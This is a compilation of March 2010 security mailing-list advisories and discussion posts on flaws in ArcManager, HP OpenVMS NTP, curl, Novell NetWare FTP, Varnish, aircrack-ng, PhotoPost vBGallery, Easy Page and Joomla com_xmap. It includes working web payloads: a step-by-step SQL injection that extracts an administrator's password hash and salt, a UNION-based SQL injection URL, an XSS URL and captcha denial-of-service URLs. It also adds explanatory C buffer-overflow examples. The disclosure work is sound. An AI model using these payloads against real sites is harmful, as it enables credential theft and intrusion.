Vulnerabilities in ArcManager
Hello Bugtraq!

I want to warn you about security vulnerabilities in ArcManager.

Advisory: Vulnerabilities in ArcManager
URL: http://websecurity.com.ua/4057/

Timeline:
17.03.2010 - found vulnerabilities.
22.03.2010 - disclosed at my site.
23.03.2010 - informed developers.

Details:
These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in the captcha script CaptchaSecurityImages.php, which is used in this system. I already reported vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/).

Insufficient Anti-automation:
http://site/libs/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Captcha bypass is possible both via half-automated or automated (using OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/), and via the session reuse with constant captcha bypass method (http://websecurity.com.ua/1551/), which was described in the project Month of Bugs in Captchas.

DoS:
http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

By setting large values of width and height it is possible to create a large load on the server.

Vulnerable are all versions of ArcManager.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[security bulletin] HPSBOV02497 SSRT090245 rev.2 - HP TCP/IP Services for OpenVMS Running NTP, Remote Execution of Arbitrary Code, Denial of Service (DoS)
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01961959
Version: 2

HPSBOV02497 SSRT090245 rev.2 - HP TCP/IP Services for OpenVMS Running NTP, Remote Execution of Arbitrary Code, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2010-03-23
Last Updated: 2010-03-26

Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP TCP/IP Services for OpenVMS Running NTP. The vulnerabilities could be remotely exploited to execute arbitrary code or create a Denial of Service (DoS).

References: SSRT090073, CVE-2009-0159, CVE-2009-1252, CVE-2009-3563

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP TCP/IP Services for OpenVMS v5.5 and v5.6 on Itanium and Alpha platforms.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference       Base Vector                    Base Score
CVE-2009-0159   (AV:N/AC:M/Au:N/C:P/I:P/A:P)       6.8
CVE-2009-1252   (AV:N/AC:M/Au:N/C:P/I:P/A:P)       6.8
CVE-2009-3563   (AV:N/AC:L/Au:N/C:N/I:P/A:P)       6.4
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has made the following patch kits available to resolve the vulnerability. Patch kit installation instructions are provided in the file readme.txt.

The patch kits and installation instructions are available from the following location using ftp:

Host             Account    Password
ftp.usa.hp.com   vmstcpip   vmsTcp1p

NTP for HP OpenVMS TCPIP patch kits are available for both ALPHA and ITANIUM platforms.

HP OpenVMS TCPIP Version   Platform   Patch kit Location   Patch kit Image
v5.5 ECO 3                 ALPHA      NTP_V55/ECO3/        qxcr1000910870_v55_eco3_alpha.bck
v5.5 ECO 3                 Itanium    NTP_V55/ECO3/        qxcr1000910870_v55_eco3_i64.bck
v5.6 ECO 4                 ALPHA      NTP_V56/ECO4/        qxcr1000910870_v56_eco4_alpha.bck
v5.6 ECO 4                 Itanium    NTP_V56/DCO4/        qxcr1000910870_v56_eco4_i64.bck
v5.6 ECO 5                 ALPHA      NTP_V56/ECO5/        QXCR1000910870_V56_ECO5_ALPHA.BCK
v5.6 ECO 5                 Itanium    NTP_V56/ECO5/        QXCR1000910870_V56_ECO5_I64.BCK

PRODUCT SPECIFIC INFORMATION
None

HISTORY
Version:1 (rev.1) 23 March 2010 Initial release
Version:2 (rev.2) 26 March 2010 Updated CVE reference and patch kit information

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-al...@hp.com
Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to
[SECURITY] [DSA 2023-1] New curl packages fix arbitrary code execution
Debian Security Advisory DSA-2023-1                    secur...@debian.org
http://www.debian.org/security/                          Steffen Joeris
March 28, 2010                          http://www.debian.org/security/faq

Package        : curl
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id         : CVE-2010-0734

Wesley Miaw discovered that libcurl, a multi-protocol file transfer library, is prone to a buffer overflow via the callback function when an application relies on libcurl to automatically uncompress data. Note that this only affects applications that trust libcurl's maximum limit for a fixed buffer size and do not perform any sanity checks themselves.

For the stable distribution (lenny), this problem has been fixed in version 7.18.2-8lenny4.

Due to a problem with the archive software, we are unable to release all architectures simultaneously. Binaries for the hppa, ia64, mips, mipsel and s390 architectures will be provided once they are available.

For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 7.20.0-1.

We recommend that you upgrade your curl packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian GNU/Linux 5.0 alias lenny
--------------------------------

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives: (download URLs and MD5 checksums omitted)
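The advisory's caveat, that only applications trusting libcurl's fixed per-call maximum for their own buffer are affected, as an added example that is not Debian's or curl's code: a CURLOPT_WRITEFUNCTION-style callback in the trusting pattern beside a bounded one, driven by a constructed chunk sequence instead of a live transfer. RESP_CAP, resp_buf and deliver are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Capacity chosen to match CURL_MAX_WRITE_SIZE (16384), the per-call maximum an application
 * might assume libcurl honours; with automatic decompression, libcurl 7.18.2 could exceed it. */
#define RESP_CAP 16384

struct resp_buf {
    char   data[RESP_CAP];
    size_t len;
};

/* Same signature as a CURLOPT_WRITEFUNCTION callback. This is the fragile pattern the DSA
 * warns about: the chunk length is trusted, so a chunk larger than the remaining space
 * overflows data[]. Shown for contrast only; never feed it an oversized chunk. */
size_t write_cb_unchecked(char *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct resp_buf *rb = userdata;
    size_t n = size * nmemb;
    memcpy(rb->data + rb->len, ptr, n);
    rb->len += n;
    return n;
}

/* Hardened callback: bound every chunk by the application's own remaining capacity and guard
 * the size*nmemb multiplication. Returning anything other than n makes libcurl abort the
 * transfer with CURLE_WRITE_ERROR, which is the safe failure mode for an oversized body. */
size_t write_cb_checked(char *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct resp_buf *rb = userdata;
    if (size != 0 && nmemb > SIZE_MAX / size)
        return 0;                                 /* size * nmemb would wrap around */
    size_t n = size * nmemb;
    if (n > RESP_CAP - rb->len)
        return 0;                                 /* chunk does not fit: refuse, don't overflow */
    memcpy(rb->data + rb->len, ptr, n);
    rb->len += n;
    return n;
}

/* Simulates libcurl delivering a decompressed body in chunks of the given sizes.
 * Returns the number of bytes accepted before the callback refused one. */
size_t deliver(size_t (*cb)(char *, size_t, size_t, void *),
               struct resp_buf *rb, const size_t *chunks, size_t nchunks)
{
    static char payload[65536];                   /* constructed response body */
    memset(payload, 'A', sizeof payload);
    for (size_t i = 0; i < nchunks; i++) {
        if (cb(payload, 1, chunks[i], rb) != chunks[i])
            break;
    }
    return rb->len;
}

int main(void)
{
    struct resp_buf rb = {{0}, 0};
    /* 8000 + 8000 fits; the third chunk (a 20000-byte decompressed burst) must be refused */
    size_t chunks[] = {8000, 8000, 20000};
    printf("accepted %zu bytes\n", deliver(write_cb_checked, &rb, chunks, 3));
    return 0;
}
```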
{PRL} Novell Netware FTP Remote Stack Overflow
#####################################################################################
Application: Novell Netware FTP Remote Stack Overflow
Platforms: Novell Netware 6.5 SP8
Exploitation: Remote Code Execution
CVE Number: CVE-2010-0625
Novell TID: 3238588
Discover Date: 2009-07-23
Author: Francis Provencher (Protek Research Lab's)
Blog: http://www.protekresearchlab.com/
#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code

#####################################################################################

=== 1) Introduction ===
Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients. (http://en.wikipedia.org/wiki/Novell)

#####################################################################################

=== 2) Report Timeline ===
2010-01-25 Vendor Contact
2010-01-26 Vendor response
2010-03-26 Coordinated release of this advisory

#####################################################################################

=== 3) Technical details ===
It's possible to overflow the stack and rewrite the EIP by sending a mkdir and a rmdir request with these special characters ~A/ 320 times.

The nlm version:
NWFTPD.nlm Netware FTP Server Version 5.09.03 October 14 2008

The registers:
Abend 1 on P00: Server-5.70.08: Page Fault Processor Exception (Error code )
Registers:
CS = 0008 DS = 0023 ES = 0023 FS = 0023 GS = 0023 SS = 0010
EAX = 0238 EBX = 7E2F417E ECX = 55AA08D4 EDX = 0001
ESI = 2F417E2F EDI = 429980C0 EBP = 417E2F41 ESP = A94A9FA4
EIP = 007E2F41 FLAGS = 00010282
Address (0x007E2F41) exceeds valid memory limit
EIP in UNKNOWN memory area
Access Location: 0x007E2F41

#####################################################################################

=== 4) The Code ===
This issue can be triggered manually.

#####################################################################################
(PRL-2010-03)
London DEFCON March meet - DC4420 - Wednesday March 31st 2010
Yes, we've just managed to squeak in the last Wednesday of the month and, as autom8on failed to burn down the venue last month, we're back to have another go...

This month's lineup is:

The tekky one: DIY grid computing - it's easier than you think
tqm will show how to create a simple grid and spread the load across many nodes using some brain cells, commodity hardware and some not-so-magic scripting

The fun one: Rocketry for fun and profit
the hatter will show us some fun (if rather efficient) ways to turn spare money into smoke, and some tips on getting more *BANG* for your buck...

Other stuff you need to know...

Venue: Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH
http://tinyurl.com/dc4420-venue

Nearest stations:
Tottenham Court Road London Underground station (150m) - zone 1
Goodge Street London Underground station (440m) - zone 1
Oxford Circus London Underground station (630m) - zone 1
Leicester Square London Underground station (680m) - zone 1
Covent Garden London Underground station (750m) - zone 1

Kickoff: Wednesday March 31st 2010
Room owned from 18:00, assimilation starts at 20:00

Beer: Yes, both kinds
Last orders 23:00

Food: Yes, tasty
Kitchen closes at 21:30

Music: Nah

Strippers: We live in hope...

Rules: Fight Club

More: http://dc4420.org

cheers,
MM

-- 
In DEFCON, we have no names... errr... well, we do... but silly ones...
Medium security hole in Varnish reverse proxy
Hi,

I've identified a couple of security flaws affecting the Varnish reverse proxy which may allow privilege escalation. These issues were reported by email to the vendor but he feels that it is a configurational issue rather than a design flaw. Whilst I can partially see his point in that the administrative interface can be disabled, I'm not convinced that making a C compiler available over a network interface without authentication is sound practice, especially when the resultant compiled code can be made to run as root rather trivially.

Tim

-- 
Tim Brown
mailto:t...@nth-dimension.org.uk
http://www.nth-dimension.org.uk/

Attachment: NDSA20090908.txt.asc
Exploiting nano
I just finished a blog post detailing how the popular text editor, nano, is unsafe to run as root to edit untrusted users' files, with consequences including full privilege escalation: http://drosenbe.blogspot.com/2010/03/nano-as-root.html This is not a disclosure of vulnerabilities per se; rather, it's just a look at how some security assumptions may not hold when running programs as root in a hostile environment, using nano as an example. Nothing earth-shattering, just thought some of you might be interested. Comments welcome. -Dan
SQL Injection Vulnerability in PhotoPost vBGallery 2.5
Product Information
-------------------
PhotoPost vBGallery is a popular commercial Image Gallery Add-on for vBulletin which is being developed by All Enthusiasts, Inc.
http://www.photopost.com

Description
-----------
PhotoPost vBGallery 2.5 allows the user to modify gallery settings for his profile page if the function is enabled and the user has permission to do so. For this function to work, PhotoPost vBGallery adds a Plug-in to hook profile_start. The PHP code on this plug-in is being used to display a form which does allow the user to customize the settings and save the settings into the database.

The SQL constructed for action updatevbgallery does contain variables that are not properly sanitized:

The POST variables profile_include and profile_exclude are treated as HTML-safe strings and used in the SQL directly, although only comma-separated integers are valid.
POST variable profile_showimg is also processed as an HTML-safe string, although only integer values are valid.
POST variable profile_column is also processed as an HTML-safe string but is not being made SQL-safe.
POST variable array profile_imagebitdisplay is being stored without being made SQL-safe.

Versions
--------
Affected Version(s): 2.5
Not affected Versions: Versions prior to 2.5

Exploit
-------
This exploit shows how to get the password hash and salt of an administrator account.

Preconditions
- No table prefix is being used
- The gallery functions are enabled for member profiles
- User-ID of an administrator account is 1
- The vBulletin database error page is unmodified and shows the executed SQL as an HTML comment
- The account being used has permissions to modify gallery profile settings

1) Go to forumroot/profile.php?do=vbgalleryprofile
2) Using Firebug, remove the maxlength attribute for the input labeled Exclude Categories
3) Enter
   ', profile_exclude = (SELECT CONCAT(password, '|||', salt) FROM user WHERE userid = 1), profile_include = '
   into the input field Exclude Categories
4) Submit the form
5) Access your own profile page (forumroot/member.php?u=X)
6) The HTML source of the database error page will contain an HTML comment like
---
Invalid SQL: SELECT imageid, images.title, images.description, filename, thumbname, originalname, extension, images.catid ,images.userid, images.username, images.description, images.dateline, images.views, posts ,width, height, originalwidth, originalheight ,filesize, originalfilesize, images.lastpostdateline, images.lastpostuserid, images.lastpostusername, votenum, votetotal, categories.title AS cattitle FROM ppgal_images AS images LEFT JOIN ppgal_categories AS categories USING (catid) WHERE valid = 1 AND images.userid = 5 AND images.catid NOT IN (abcdef12344777148822d7530f089fbd|||.%/) AND images.thumbname != ''
---
The string after AND images.catid NOT IN ( is the password hash and salt of user ID 1 separated by |||

Suggested Fixes
---------------
Properly sanitize user input and run strings through $db->escape_string() before saving them into the database

Patches
-------
All Enthusiasts, Inc. was informed about this vulnerability on 2010/03/17 but has not yet released a patch.
Remote buffer overflow in aircrack-ng causes DOS and possible code execution
We can cause aircrack-ng and airdecap-ng to crash when reading specially crafted dump files and can also crash remote airodump-ng sessions by sending specially crafted packets over the air. I am 90% sure that this denial-of-service can be escalated to remote code execution by carefully introducing new stations to airodump-ng (for memory allocation) and then causing a heap corruption as demonstrated.

The tools' code responsible for parsing IEEE 802.11 packets assumes the self-proclaimed length of an EAPOL packet to be correct and never to exceed an (arbitrary) maximum size of 256 bytes for packets that are part of the EAPOL authentication. We can exploit this by letting the code parse packets which:

a) proclaim to be larger than they really are, possibly causing the code to read from invalid memory locations while copying the packet;
b) really do exceed the maximum size allowed and overflow data structures allocated on the heap, overwriting libc's allocation-related structures. This causes heap corruption.

Steps to Reproduce:
1. Get the example file from http://pyrit.googlecode.com/svn/tags/opt/aircrackng_exploit.cap; or generate it via http://pyrit.googlecode.com/svn/tags/opt/aircrackng_exploit.py;
2. Run it through aircrack-ng, airdecap-ng or airodump-ng (airodump-ng -r aircrackng_exploit.cap)
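The two length-mismatch cases described above, as an added example that is not aircrack-ng's code: a bounded copy of an EAPOL frame into a 256-byte per-station buffer that rejects both a claimed length larger than the captured frame (case a) and a real length larger than the buffer (case b). The struct layout, EAPOL_MAX, the result codes and make_eapol are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Fixed-size EAPOL buffer per station, mirroring the 256-byte limit the advisory describes
 * (the layout is an assumption for this example, not aircrack-ng's actual struct). */
#define EAPOL_MAX 256
#define EAPOL_HDR 4               /* version(1) + type(1) + body length(2, big-endian) */

struct station {
    uint8_t eapol[EAPOL_MAX];
    size_t  eapol_size;
};

enum { EAPOL_OK = 0, EAPOL_SHORT = -1, EAPOL_TRUNCATED = -2, EAPOL_TOO_LARGE = -3 };

/* Bounded copy: the claimed length is checked against both what was actually captured and
 * the destination capacity before any memory is touched. body points at the EAPOL header. */
int copy_eapol_checked(const uint8_t *body, size_t body_len, struct station *st)
{
    if (body_len < EAPOL_HDR)
        return EAPOL_SHORT;                       /* not even a full header present */
    size_t claimed = ((size_t)body[2] << 8) | body[3];
    size_t total   = EAPOL_HDR + claimed;         /* cannot wrap: claimed <= 0xFFFF */
    if (total > body_len)
        return EAPOL_TRUNCATED;                   /* case (a): claims more than was captured */
    if (total > EAPOL_MAX)
        return EAPOL_TOO_LARGE;                   /* case (b): would overflow eapol[] */
    memcpy(st->eapol, body, total);
    st->eapol_size = total;
    return EAPOL_OK;
}

/* Builds a constructed EAPOL-Key frame body with an arbitrary claimed length and a given
 * actual body size, so the two mismatch cases can be exercised. Returns bytes written. */
size_t make_eapol(uint8_t *buf, size_t bufsz, uint16_t claimed, size_t actual_body)
{
    size_t total = EAPOL_HDR + actual_body;
    if (total > bufsz)
        return 0;
    memset(buf, 0xAA, total);                     /* constructed filler payload */
    buf[0] = 2;                                   /* EAPOL protocol version */
    buf[1] = 3;                                   /* packet type 3 = EAPOL-Key */
    buf[2] = (uint8_t)(claimed >> 8);
    buf[3] = (uint8_t)(claimed & 0xFF);
    return total;
}

int main(void)
{
    uint8_t frame[1024];
    struct station st = {{0}, 0};
    size_t n;

    n = make_eapol(frame, sizeof frame, 95, 95);      /* honest handshake-sized frame */
    printf("valid:     %d\n", copy_eapol_checked(frame, n, &st));
    n = make_eapol(frame, sizeof frame, 300, 95);     /* claims 300 bytes, only 95 captured */
    printf("truncated: %d\n", copy_eapol_checked(frame, n, &st));
    n = make_eapol(frame, sizeof frame, 400, 400);    /* really 404 bytes, exceeds 256 */
    printf("too large: %d\n", copy_eapol_checked(frame, n, &st));
    return 0;
}
```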
Vulnerabilities in MiniManager for Project MANGOS
Hello Bugtraq!

I want to warn you about security vulnerabilities in MiniManager for Project MANGOS.

Advisory: Vulnerabilities in MiniManager for Project MANGOS
URL: http://websecurity.com.ua/4061/

Timeline:
17.03.2010 - found vulnerabilities.
23.03.2010 - disclosed at my site.
24.03.2010 - informed developers.

Details:
These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in the captcha script CaptchaSecurityImages.php, which is used in this system. I already reported vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/).

Insufficient Anti-automation:
http://site/libs/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Captcha bypass is possible both via half-automated or automated (using OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/), and via the session reuse with constant captcha bypass method (http://websecurity.com.ua/1551/), which was described in the project Month of Bugs in Captchas.

DoS:
http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

By setting large values of width and height it is possible to create a large load on the server.

Vulnerable are MiniManager for Project MANGOS 0.15 and previous versions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
XSS vulnerability in easy page cms
###############################################################
# Securitylab.ir
#
# Application Info:
# Name: Easy Page
# Vendor: http://easypage.org
#
# Vulnerability Info:
# Type: XSS
# Risk: low
# Vulnerability: http://site.ir/default.aspx?page=Document&app=Documents&docId=1&docParId=<script>(xss)</script>
#
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com
###############################################################
Re: [Full-disclosure] Medium security hole in Varnish reverse proxy
Post some code that people can evaluate.

For starters, there's no reason why varnish ever has to run as root. It never listens on privileged ports, and the C compiler is never available over a network interface. You can ask varnish to reload a configuration and recompile it, but you'd have to have write access to the filesystem first. You can also only cause recompilation to occur if the admin interface is up and running, which can be easily disabled.

Poul is probably correct. Any vulnerabilities in Varnish with regards to privilege escalation are configuration issues.

-j

On Mon, Mar 29, 2010 at 12:49 AM, Tim Brown <t...@nth-dimension.org.uk> wrote:
> Hi,
>
> I've identified a couple of security flaws affecting the Varnish reverse proxy which may allow privilege escalation. These issues were reported by email to the vendor but he feels that it is a configurational issue rather than a design flaw. Whilst I can partially see his point in that the administrative interface can be disabled, I'm not convinced that making a C compiler available over a network interface without authentication is sound practice, especially when the resultant compiled code can be made to run as root rather trivially.
>
> Tim
>
> --
> Tim Brown
> mailto:t...@nth-dimension.org.uk
> http://www.nth-dimension.org.uk/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Joomla Component com_xmap Sql Injection Vulnerability
###############################################################
# Securitylab.ir
#
# Application Info:
# Name: Joomla Component com_xmap
#
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Vulnerability: http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
#
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir whh_iran[AT]yahoo.com
###############################################################